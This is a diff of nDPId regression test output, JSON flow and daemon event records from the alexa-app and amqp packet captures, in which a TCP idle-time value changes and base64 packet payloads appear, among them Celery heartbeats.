-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":3435,"packets-processed":3406,"total-skipped-flows":0,"total-l4-data-len":1226087,"total-not-detected-flows":0,"total-guessed-flows":14,"total-detected-flows":146,"total-detection-updates":141,"total-updates":0,"current-active-flows":0,"total-active-flows":160,"total-idle-flows":160,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1073,"global_ts_msec":1490976198776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/amqp.pcap.out b/test/results/amqp.pcap.out index 2085e365f..58077cd3b 100644 --- a/test/results/amqp.pcap.out +++ b/test/results/amqp.pcap.out @@ -1,23 +1,23 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"amqp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1490904166118} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} -00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"} -01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} 